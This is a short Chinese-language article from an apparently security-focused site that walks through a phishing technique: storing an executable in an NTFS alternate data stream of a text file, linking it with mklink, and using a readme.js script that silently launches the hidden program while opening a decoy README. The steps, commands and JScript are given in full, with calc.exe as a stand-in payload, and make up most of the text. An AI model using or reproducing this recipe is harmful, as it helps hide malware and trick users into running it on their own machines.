神刀安全网

使用文件流ADS 及 JavaScript 进行钓鱼攻击

1.创建一个txt文件,test.txt,随便添加内容(实际的工具,即用户要用的那个工具)。

2.将程序写入文件流(此处用calc.exe)

type calc.exe > test.txt:calc.exe 

3.使用mklink创建文件链接:

mklink config.txt test.txt:calc.exe 

4.创建readme.txt,文件内容随便。设置为隐藏。

5.创建readme.js,内容如下:

var objShell = new ActiveXObject("shell.application");  objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);  objShell.ShellExecute("README.txt", "", "", "open", 1); 

执行readme.js,运行calc.exe ,打开readme.txt

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 使用文件流ADS 及 JavaScript 进行钓鱼攻击

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮